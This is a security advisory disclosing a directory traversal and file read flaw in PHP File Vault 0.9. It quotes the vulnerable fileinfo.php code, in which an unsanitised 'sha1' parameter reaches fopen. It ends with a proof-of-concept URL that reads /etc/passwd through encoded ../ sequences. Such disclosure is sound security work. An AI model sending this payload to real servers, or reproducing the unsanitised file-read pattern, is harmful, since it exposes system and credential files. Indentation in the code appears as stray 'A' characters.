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PHP File Vault 0.9 Directory Traversal / File Read

PHP File Vault 0.9 Directory Traversal / File Read
Posted Jul 25, 2016
Authored by N_A

PHP File Vault version 0.9 suffers from directory traversal and file reading vulnerabilities.

tags | exploit, php, vulnerability, file inclusion
SHA-256 | 0e4a65a96a4a22d45e2f891b953ae6e0f8559136da12d4e2c558f8a051f8c198

PHP File Vault 0.9 Directory Traversal / File Read

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PHP File Vault version 0.9 , remote directory traversal and read file vulnerabilty 
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Discovered by N_A, N_A[at]tutanota.com
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Description
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A very small PHP website application which stores anonymously uploaded files and retrieves them by SHA1 hash (a fingerprint of the file which is provided after uploading). Developed for anonysource.org , a kanux project.

https://sourceforge.net/projects/php-file-vault



Vulnerability
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The vulnerability exists within the fileinfo.php file of the package:


A A A if (empty($_GET['sha1'])) die("sha1 is required to get file info");
A A A $sha1 = trim($_GET['sha1']);


the 'sha1' variable is requested via the GET method. It is passed as a variable to the 'parseFileInfo' function. This function incorporates a call to
the fopen() function within PHP:



A A A A A A function parseFileInfo($fi) {
A A A A A A $fh = fopen($fi,'r');
A A A A A A $fname = trim(fgets($fh));
A A A A A A fclose($fh);
A A A A A A return array($fname);
A A A A A }



The parseFileInfo() function is called within the file fileinfo.php with the 'sha1' variable inside:

A A A A A A if (!is_readable(FI.$sha1)) die("cannot read file info!");
A A A A A A list($fname) = parseFileInfo(FI.$sha1);

A A A A A A readfile('head.html');

A A A A A A if ($fname) echo "<h1><a href=\"/$sha1\">$fname</a></h1>";


This is the vulnerability that allows parts of *any world readable* file to be read by a remote attacker.

Attacks can include gathering sensitive information, .bash_history, .rhosts, /etc/passwd and so on.


Proof Of Concept
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PoC exploit = http://127.0.0.1/htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd



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